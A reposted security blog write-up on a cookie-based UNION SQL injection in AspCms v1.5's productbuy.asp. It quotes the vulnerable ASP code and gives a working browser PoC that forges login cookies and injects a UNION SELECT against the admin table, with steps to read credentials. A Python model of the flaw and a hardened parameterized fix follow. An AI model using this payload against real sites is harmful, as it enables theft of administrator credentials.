AspCms_v1.5_20110517 SQL injection

暗月博客, 2019-11-21 17:49:13

A few days ago I came across a small site running AspCms. A quick search showed that productbuy.asp had a known injection, but the target had already patched it... I downloaded the code, and oddly enough, although the vendor had fixed the publicly reported bug in productbuy.asp, I found another injection further down in the very same file.

Without further ado, here is the code:

```asp
<%
if action = "buy" then
    addOrder()
else
    echoContent()
end if

' ...... (omitted)

Sub echoContent()
    dim id
    id=getForm("id","get")
    ' the GET parameter is at least gated by isnum()
    if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"   ' "Please choose a product!"
    dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
    dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
    Dim templatePath,tempStr
    templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
    set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
    selectproduct=rsObj(0)
    Dim linkman,gender,phone,mobile,email,qq,address,postcode
    if isnul(rCookie("loginstatus")) then wCookie "loginstatus",0
    if rCookie("loginstatus")=1 then
        ' the userID cookie is trimmed and concatenated straight into the query
        set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
        linkman=rsObj("truename")
        gender=rsObj("gender")
        phone=rsObj("phone")
        mobile=rsObj("mobile")
        email=rsObj("email")
        qq=rsObj("qq")
        address=rsObj("address")
        postcode=rsObj("postcode")
    else
        gender=1
    end if
    rsObj.close()
    with templateObj
        .content=loadFile(templatePath)
        .parseHtml()
        .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
        .content=replaceStr(.content,"[aspcms:linkman]",linkman)
        .content=replaceStr(.content,"[aspcms:gender]",gender)
        .content=replaceStr(.content,"[aspcms:phone]",phone)
        .content=replaceStr(.content,"[aspcms:mobile]",mobile)
        .content=replaceStr(.content,"[aspcms:email]",email)
        .content=replaceStr(.content,"[aspcms:qq]",qq)
        .content=replaceStr(.content,"[aspcms:address]",address)
        .content=replaceStr(.content,"[aspcms:postcode]",postcode)
        .parseCommon()
        echo .content
    end with
    set templateobj =nothing : terminateAllObjects
End Sub
%>
```

The vulnerability is obvious; not much to say. The `id` parameter is checked with `isnum()`, but once the `loginstatus` cookie equals 1 the `userID` cookie is trimmed and concatenated directly into the `aspcms_Users` query, and both cookies are written by the client, so no login is needed. The fields read from the result (`truename`, `gender`, `phone`, ...) are substituted into the template and echoed, which makes this a UNION-based injection whose output lands on the page.

PoC (paste into the browser's address bar on the target site, then request productbuy.asp with a valid numeric `id`; any `action` other than `buy` reaches `echoContent()`):

```javascript
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));
```

The 22 constants only make the UNION's column count match `aspcms_Users`; since `rsObj("truename")` and friends read the first record by ordinal position, whatever the injected SELECT returns at those positions is what the template renders. To read data, pick a `UserID` that does not exist so the injected row is the first record, and replace the constant at the position mapped to `truename` (or another rendered field) with a column of `[Aspcms_Admins]`.
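The pattern above, reproduced as an added example (my code, not AspCms's) against a constructed SQLite stand-in schema, so the concatenation and the UNION leak can be run offline and compared with a hardened lookup. The table and column names in `SCHEMA` are simplified stand-ins (five columns instead of the real `aspcms_Users` width, and made-up `Aspcms_Admins` columns), and `is_num()` assumes AspCms's `isnum()` accepts digits only:

```python
"""Model of the productbuy.asp cookie injection, with a hardened form.

Added example, not AspCms code. The schema below is a constructed
SQLite stand-in (5 columns instead of the real aspcms_Users width and
made-up Aspcms_Admins columns); isnum() is assumed to accept digits only.
"""
import sqlite3

# Constructed stand-in schema and rows; not the real AspCms tables.
SCHEMA = """
CREATE TABLE aspcms_Users (
    UserID INTEGER PRIMARY KEY, truename TEXT, gender INTEGER,
    phone TEXT, email TEXT);
CREATE TABLE Aspcms_Admins (
    AdminID INTEGER PRIMARY KEY, LoginName TEXT, LoginPassword TEXT);
INSERT INTO aspcms_Users VALUES (1, 'Alice', 1, '555-0100', 'alice@example.invalid');
INSERT INTO Aspcms_Admins VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
"""

# Same shape as the blog's PoC: UserID=0 matches nothing, so the injected row is
# the only record, and admin columns sit at the positions the template renders
# as truename and phone. The column count (5) matches the stand-in table.
DEMO_PAYLOAD = "0 union select 1,LoginName,0,LoginPassword,'' from Aspcms_Admins"


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def is_num(value):
    """Stand-in for AspCms isnum(): unsigned decimal digits only (assumption)."""
    return value.isdigit()


def row_to_fields(row):
    """Mirror rsObj("truename") etc.: the fields the template substitutes."""
    return {"truename": row[1], "gender": row[2], "phone": row[3], "email": row[4]}


def vulnerable_lookup(conn, cookies):
    """echoContent() as written: loginstatus and userID are both cookies the
    client controls, and userID is concatenated into the SQL unchanged."""
    if cookies.get("loginstatus") != "1":
        return None
    sql = "select * from aspcms_Users where UserID=" + cookies.get("userID", "").strip()
    row = conn.execute(sql).fetchone()
    return row_to_fields(row) if row else None


def hardened_lookup(conn, cookies):
    """Minimal fix: apply the same isnum() gate the function already uses for
    `id`, and bind the value instead of concatenating it. Not a complete fix
    on its own: loginstatus/userID are still client-written, so any visitor
    can read any user's profile; the identity must come from a server-side
    session, not from cookies."""
    user_id = cookies.get("userID", "").strip()
    if cookies.get("loginstatus") != "1" or not is_num(user_id):
        return None
    row = conn.execute(
        "select * from aspcms_Users where UserID=?", (int(user_id),)
    ).fetchone()
    return row_to_fields(row) if row else None


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", vulnerable_lookup(db, {"loginstatus": "1", "userID": DEMO_PAYLOAD}))
    print("hardened:  ", hardened_lookup(db, {"loginstatus": "1", "userID": DEMO_PAYLOAD}))
```

With the payload, `vulnerable_lookup` returns the admin login name in the `truename` slot and the password hash in the `phone` slot, exactly the fields `productbuy.html` would display; `hardened_lookup` rejects the same cookie before it ever reaches the database.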

Original post: AspCms_v1.5_20110517 SQL注射, https://cn-sec.com/archives/70766.html (CN-SEC中文网; please keep this link when reposting).
